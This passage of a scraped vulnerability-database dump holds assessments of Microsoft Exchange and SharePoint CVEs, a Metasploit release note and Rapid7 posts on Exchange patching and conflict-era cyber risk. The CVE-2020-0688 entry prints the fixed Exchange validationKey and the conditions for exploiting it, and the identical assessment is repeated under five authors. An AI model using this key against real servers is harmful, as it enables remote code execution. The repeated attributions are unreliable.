up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**todb-r7** at April 09, 2020 2:08pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**ccondon-r7** at March 06, 2020 11:31pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**tsellers-r7** at March 05, 2020 10:29pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**gwillcox-r7** at October 20, 2020 6:47pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**jbarto** at February 28, 2020 4:51pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-0688 - Exchange Control Panel Viewstate Deserialization Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-07-27T00:00:00", "id": "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "href": "https://attackerkb.com/topics/XbYcn2Mckk/cve-2020-0688---exchange-control-panel-viewstate-deserialization-bug", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T17:28:29", "description": "Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142.\n\n \n**Recent assessments:** \n \n**cnotin** at December 10, 2020 12:16am UTC reported:\n\nRequire access to OWA EWS, authenticated with password or NTLM hash \nDeserialization bug \nOnly concerns Exchange 2010 because the vulnerable feature is missing from later versions according to writeup\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-17144", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2021-02-22T00:00:00", "id": "AKB:3B7AE30E-7135-4027-A5DA-A88A045903F6", "href": "https://attackerkb.com/topics/815zdKgU7S/cve-2020-17144", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-10-04T22:45:06", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\n**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-22T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities/rapid7-analysis", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-12T20:56:10", "description": "## MicroFocus? More like MacroVuln\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/02/metasploit-blg-2-small-1-1.png)\n\nMicroFocus\u2019s Operations Bridge Manager is a security information and event management (SIEM) tool designed to collect and parse security logs from multiple disparate sources. OBM has a large attack surface\u2014something [Pedro Ribeiro](<https://github.com/pedrib>) was able to take advantage of with his new [RCE module](<https://github.com/rapid7/metasploit-framework/pull/14671>). This module leverages a Java deserialization bug to allow payload execution as either root or SYSTEM, depending on the victim OS.\n\nWe've one other OBM module currently in the process of being landed, but for anyone who needs their fix of MicroFocus hacks right away, we'd recommend pedrib\u2019s [super detailed writeup](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md>) of his findings.\n\n## Patches? We don't need no stinkin' patches!\n\nWhile [PR #14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) doesn\u2019t add a totally new exploit for Microsoft Exchange Server, that's only because [zeroSteiner](<https://github.com/zeroSteiner>) was able to update an earlier module to support a bypass for the patch that was _supposed_ to fix the vuln it exploited.\n\n[CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>) originally allowed remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server so long as they were authenticated as a user who had an active mailbox and who was assigned the `Data Loss Prevention` role. This was believed to have been patched in the [Exchange Server 2016 Cumulative Update 18](<https://support.microsoft.com/en-us/topic/cumulative-update-18-for-exchange-server-2016-c1af0ead-3bde-e4db-5f24-9f597050dcbf>) (September 15 2020) and [Exchange Server 2019 Cumulative Update 7](<https://support.microsoft.com/en-us/topic/cumulative-update-7-for-exchange-server-2019-b763863a-8a2f-9eb9-f3cc-4c4098e0e413>) (September 15 2020). However, this patch was later bypassed and assigned [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132?referrer=blog>). Microsoft\u2019s second patch was also later bypassed\u2014a tough shake for organizations\u2019 patch cycles. Both the [original vulnerability](<https://srcincite.io/advisories/src-2020-0019/>) and [the patch bypass](<https://srcincite.io/advisories/src-2020-0032/>)) were discovered by [Steven Seeley](<https://twitter.com/steventseeley/status/1349058761370071041>), and the Metasploit code is based on his work.\n\nzeroSteiner's changes allow the `exchange_ecp_dlp_policy` module to exploit the two patched versions of Exchange Server and the unpatched server.\n\n## External modules, internal quality\n\nLast but not least, [cgranleese-r7](<https://github.com/cgranleese-r7>) has spearheaded our efforts to improve usability of [Metasploit\u2019s external modules](<https://blog.rapid7.com/2018/09/05/external-metasploit-modules-the-gift-that-keeps-on-slithering/>) by providing more informative error messages for users when they lack the required languages in their environment ([#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>)). This will help avoid instances of users missing out on useful modules due to their not knowing some languages outside of ruby can be needed for the full metasploit experience.\n\n> msf6 > use auxiliary/scanner/msmail/host_id \n[-] Failed to load module: LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment. \nmsf6 >\n\n## New modules (1)\n\n * [Micro Focus Operations Bridge Manager Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14671>) by Pedro Ribeiro, which exploits ZDI-20-1327 / [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>) This adds an exploit module that leverages an insecure Java deserialization vulnerability in multiple Micro Focus products. This allows remote code execution as the root user on Linux or the SYSTEM user on Windows. Initial authentication is required, but any low-privileged user can be used to successfully run this exploit.\n\n## Enhancements and features\n\n * [#14154](<https://github.com/rapid7/metasploit-framework/pull/14154>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) This ensures that all modules that previously used manual `AutoCheck` behavior now leverage the `AutoCheck` mixin instead.\n * [#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Improves the handling of external modules when they're missing runtime dependencies and gives the user a more useful error. It will now return which runtime language the user is missing on their environment (this has been implemented for both Python and Go).\n * [#14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) from [zeroSteiner](<https://github.com/zeroSteiner>) This updates the Exchange ECP DLP Policy module exploit to leverage a new technique that bypasses the original patch. This new technique also works on unpatched versions.\n * [#14669](<https://github.com/rapid7/metasploit-framework/pull/14669>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves error message feedback when using the `auxiliary/analyze/crack_*` modules. Examples include notifying the user that the database needs to be active, and having JohnTheRipper Jumbo patch installed\n * [#14685](<https://github.com/rapid7/metasploit-framework/pull/14685>) from [geyslan](<https://github.com/geyslan>) Reduced the size of the `linux/x64/shell_bind_tcp_random_port` payload while maintaining the functionality.\n * [#14708](<https://github.com/rapid7/metasploit-framework/pull/14708>) from [timwr](<https://github.com/timwr>) Add offsets to the `exploit/osx/browser/safari_proxy_object_type_confusion` exploit module for Mac OSX 10.13.1 and 10.13.2.\n * [#14721](<https://github.com/rapid7/metasploit-framework/pull/14721>) from [bcoles](<https://github.com/bcoles>) This adds a target for Debian 10 to the sudo exploit [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>).\n * [#14728](<https://github.com/rapid7/metasploit-framework/pull/14728>) from [FireFart](<https://github.com/FireFart>) Updates have been made to `lib/msf/core/module/reference.rb` as well as associated tools and documentation to update old WPVDB links with the new WPVDB domain and to also ensure that the new URL format is properly checked in the respective tools.\n * [#14725](<https://github.com/rapid7/metasploit-framework/pull/14725>) by [h00die](<https://github.com/h00die>) moves creds to a default-cred "userpass" list instead of splitting known cred pairs across files.\n\n## Bugs fixed\n\n * [#14714](<https://github.com/rapid7/metasploit-framework/pull/14714>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates the sqlite gem in preparation for Ruby 3.0 support & fixes SQLite3 deprecation warning.\n * [#14720](<https://github.com/rapid7/metasploit-framework/pull/14720>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixed an issue in the `lib/msf/core/exploit/remote/http_client.rb` and `lib/msf/core/opt_http_rhost_url.rb` libraries where the `VHOST` datastore variable would be set incorrectly if a user used an `/etc/hosts` entry for resolving a hostname to an IP address.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-04T11%3A13%3A25-06%3A00..2021-02-11T08%3A23%3A00-06%3A00%22>)\n * [Full diff 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/compare/6.0.29...6.0.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-02-12T19:26:37", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11853", "CVE-2020-16875", "CVE-2020-17132", "CVE-2021-3156"], "modified": "2021-02-12T19:26:37", "id": "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C", "href": "https://blog.rapid7.com/2021/02/12/metasploit-wrap-up-98/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T16:39:11", "description": "![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/Microsoft_Exchange.jpg)\n\nToday's topic is Exchange 2010, which reaches end of support (EoS) on Oct. 13, 2020, as well as a survey of other versions of Exchange and how well they are being kept up-to-date. During our work with [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), we consistently see the use of old and EoS software on the internet. This is generally a cause for concern, because this typically means that vulnerabilities will not be fixed. It is also an indicator that the environment the software is running in has other security issues.\n\nThe key takeaways from this post are:\n\n * Organizations running Exchange 2010 and earlier should upgrade to supported technology as soon as possible.\n * Organizations running Exchange 2013 should begin planning to upgrade to newer technologies.\n * Statistically speaking, most organizations running any version of Exchange are missing updates for critical vulnerabilities.\n\nBefore I move on, I want to point out that our numbers here will be fairly accurate, but not perfect. This is due to a couple of factors: First, the method that we use to fingerprint Exchange OWA allows us to determine the Exchange version down to `<major version>.<minor version>.<build number>`, but we cannot see the revision. For example, for Exchange Server 2019 Cumulative Update (CU) 7, with the latest updates the build number is `15.2.721.2`, but we only see `15.2.721`. This means that we can tell that the server is running 2019 CU7, but we can't be sure whether this month's patches were installed. Second, and most frustrating, is that Microsoft's updates don't always adjust the version number shown by tooling. Even Microsoft's own Exchange Admin Center and `Get-ExchangeServer` command will report incorrect versions in many instances.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n## Exchange 2010: A decade of support ends\n\nJust under 11 years ago, Microsoft released Exchange 2010. On Tuesday, Oct. 13, 2020, Microsoft Exchange 2010 will reach [End of Support (EoS) status](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). Microsoft will not provide **any** updates, including security fixes, after this date. While the software will keep working after this date, a quick glance at the Exchange vulnerabilities announced in 2020 will quickly show the importance of security updates.\n\nIn March 2020, we used Project Sonar to measure the number of Exchange servers that might be vulnerable to [CVE-2020-0688](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>). At that time, we found over 166,000 Exchange 2010 servers with internet-facing Outlook Web App (OWA) services. On Monday, Sept. 21, 2020, we looked again and found that while the numbers had decreased, there are still 139,771 OWA services.\n\n![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/exchange_2010-version-distribution.png)\n\nThat's a scary number of servers that will not receive security updates for any future vulnerabilities. Both scary and disappointing is the fact that 40,000 of these were already running unsupported versions of Exchange 2010. Nearly 54,000 of these have not been updated in six years!\n\n## Exchange 2007: Long past its expiration date\n\nSpeaking of software that hasn't seen updates in years, there are 16,577 Exchange 2007 servers with OWA on the public internet. This product has been out of support for over three years. Additionally, the newest version of Windows Server that Exchange 2007 runs on is Windows Server 2008 R2, which reached EoS in January 2020. In summary, this is a business-critical application running in an environment in which vulnerabilities will not be fixed.\n\n![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/exchange_2007-version-distribution.png)\n\n## Exchange 2013: The twilight years\n\nExchange 2013 transitioned to Extended Support in 2018 and will cease to be supported at all on April 11, 2023. Additionally, the newest version of Windows Server that Exchange 2013 runs on is Windows Server 2012 R2, [which reaches EoS on Oct. 10, 2023](<https://docs.microsoft.com/en-us/lifecycle/products/windows-server-2012-r2>). In short, the full Exchange 2013 environment, other than AD, will be **completely unsupported** in less than three years.\n\nOur Project Sonar metrics for OWA show that there are at least 102,593 Exchange 2013 servers on the public internet. Further, 67,567 (~66%) are not running a version of Exchange that Microsoft considers "Supported."\n\n![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/exchange_2013-version-distribution.png)\n\nGiven that Exchange is typically considered a business-critical application, and how complex an upgrade can be, we strongly recommend that organizations running Exchange 2013 start planning the upgrade process and timeline. The \n"Upgrading considerations" portion of the "Taking actions" section at the end of the blog post calls out a few of the considerations that might make this process time-consuming or challenging.\n\n## Exchange 2016 and 2019: Newer, but still vulnerable\n\nWhile Exchange 2016 and 2019 will be supported for some time to come, organizations running them appear to be doing a poor job of keeping their environments up-to-date.\n\nOf the ~138,000 Exchange 2016 servers, 87% were missing the most recent updates.\n\n![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/exchange_2016-version-distribution.png)\n\nSimilarly, 77% of the ~25,000 Exchange 2019 servers we observed were missing updates. There are nearly 2,100 that, as far as we can tell, have _never_ had updates installed.\n\n![Microsoft Exchange 2010 End of Support and Overall Patching Study](https://blog.rapid7.com/content/images/2020/09/exchange_2019-version-distribution.png)\n\n## Taking action\n\nGiven the potential risks that a compromised Exchange environment present, we have the following recommendations:\n\n * Organizations using Exchange 2010 or earlier should aggressively pursue upgrading their environment to supported technologies.\n * Organizations using Exchange 2013 should ensure they have a plan and timeline for upgrading to supported technologies by April 11, 2023. Remember that the most modern version of Windows Server that 2013 supports is also going EoS that year, so the process may introduce new server OSes into the environment as well. Please see the "Upgrading considerations" section below for some of the challenges that may need to be accounted for.\n * Organizations using Exchange 2016 or on-premises 2019 should ensure their Exchange environment is currently up-to-date and that there is a plan and process for keeping it updated.\n * Organizations using Exchange hosted by a non-Microsoft vendor should ensure the vendor has a plan and process for keeping the software up-to-date. They should also verify this is being done and hold the vendor accountable if not.\n * Leverage [vulnerability management tools](<https://www.rapid7.com/products/insightvm/>) and other types of tools to detect when Exchange environments are missing updates. They will be particularly helpful when Exchange version numbers cannot be reliably determined.\n\n### Upgrading considerations\n\nUpgrading an Exchange environment is a very complex task that is compounded by the server and client dependencies. This is why planning in advances is critical. Here are some examples of some issues organizations may run into when planning an upgrade:\n\n * **Upgrading from Exchange 2010:** There is no direct upgrade path from Exchange 2010 to Exchange 2019. Organizations will need to upgrade to Exchange 2013 or 2016 first.\n * **Active Directory (AD) server OS:** Exchange 2019 doesn't support Windows Server 2012 AD servers and requires the AD forest functional level to be at least 2012 R2.\n * **TLS:** Exchange 2019, by default, requires TLS 1.2. This means that clients will need to support TLS 1.2, or other workarounds will need to be implemented in order to support legacy clients.\n * **Outlook compatibility:** Exchange 2019 requires at least Outlook 2013 with the most recent updates. Keep in mind that Outlook 2013 goes EoS April 11, 2023, so those leveraging it should upgrade to Outlook 2016 or higher.\n * **Unified Messaging (UM):** UM was removed in Exchange 2019\n * **Web browser compatibility:** Exchange 2019 doesn't support Internet Explorer 10 or lower.\n\n#### Assess Your Environment for Microsoft Exchange Vulnerabilities and Take Action\n\n[Get Started](<https://www.rapid7.com/trial/insightvm/>)", "cvss3": {}, "published": "2020-09-29T16:05:16", "type": "rapid7blog", "title": "Microsoft Exchange 2010 End of Support and Overall Patching Study", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-09-29T16:05:16", "id": "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "href": "https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T03:28:00", "description": "![Staying Secure in a Global Cyber Conflict](https://blog.rapid7.com/content/images/2022/02/russia-ukraine-blog2.jpg)\n\nNow that [Russia has begun its armed invasion of Ukraine](<https://www.axios.com/putin-delares-war-on-ukraine-5a28dbd5-362f-4e97-91e1-84272f7390fd.html>), we should expect increasing risks of cybersecurity attacks and incidents, either as spillover from cyberattacks targeting Ukraine or direct attacks against actors supporting Ukraine.\n\nAny state-sponsored Russian attacks aiming to support the Russian invasion of Ukraine, or to retaliate for US, NATO, or other foreign measures taken in response to the Russian invasion of Ukraine, are most likely to be destructive or disruptive in nature rather than aiming to steal data. This blog discusses the types of attacks organizations may see \u2014 including distributed denial of service (DDoS), website defacements, and the use of ransomware or destructive malware \u2014 and recommends steps for their mitigation or remediation. \n\nAs we have [stated](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>) before, we do not believe organizations need to panic. But as per guidance from numerous governments, we do believe it is wise to be extra vigilant at this time. Rapid7 will continue to monitor the cybersecurity risks, both internally and for our Managed Detection and Response (MDR) customers as the situation evolves. We will post updates as relevant and suggest subscription to our blog to see them as they are posted. \n\n\n## Malware\n\nOne of the most concerning possibilities is the risk of a destructive malware attack on the US, NATO members, or other foreign countries. This could take the form of a direct attack or spillover from an attack on Ukraine, such as the [2017 NotPetya operation that targeted Ukraine and spread to other parts of the globe](<https://www.rapid7.com/blog/post/2017/06/27/petya-ransomware-explained/>). Cybersecurity researchers have just discovered a new data wiping malware, dubbed HermeticWiper (AKA KillDisk.NCV), that infected hundreds of Ukrainian machines in the last two months. This seems to be a custom-written malware that corrupts the Master Boot Record (MBR), resulting in boot failure. This malware, like NotPetya, is intended to be destructive and will cripple the assets that it infects. \n\nAs always, the best malware prevention is to avoid infection in the first place \u2014 a risk we can minimize by ensuring that assets are up to date and use strong access controls, including multi-factor authentication. Additionally, it is crucial to have an incident response plan in place for the worst-case scenario, as well as a business continuity plan \u2014 including failover infrastructure if possible \u2014 for business-critical assets. \n\n\n## DDoS\n\nThere have already been [reports](<https://www.vice.com/en/article/v7dpbd/ukraines-military-banks-suffering-ddos-attacks>) of DDoS attacks on Ukrainian websites, and Russia has [historically](<https://cyberlaw.ccdcoe.org/wiki/Georgia-Russia_conflict_\$2008\$>) used DDoS in support of operations against other former Soviet republics, such as Georgia, in the past. Given this context, it is plausible that state-sponsored Russian actors would use DDoS if they choose to retaliate in response to measures taken against Russia for the invasion of Ukraine, such as sanctions or cyber operations from NATO countries. \n\nWhile DDoS does not receive the same level of attention as some other forms of attack, it can still have significant impacts to business operations. DDoS mitigations can include reduction of attack surface area via Content Distribution Networks or load balancers, as well as the use of Access Control Lists and firewalls to drop traffic coming from attacker nodes. \n\n\n## Phishing campaigns\n\nRussian state-sponsored actors are also well known for [engaging in spear-phishing attacks](<https://www.cisa.gov/uscert/ncas/alerts/TA18-074A>), specifically with compromised valid accounts. Defenders should ensure strong spam filtering and 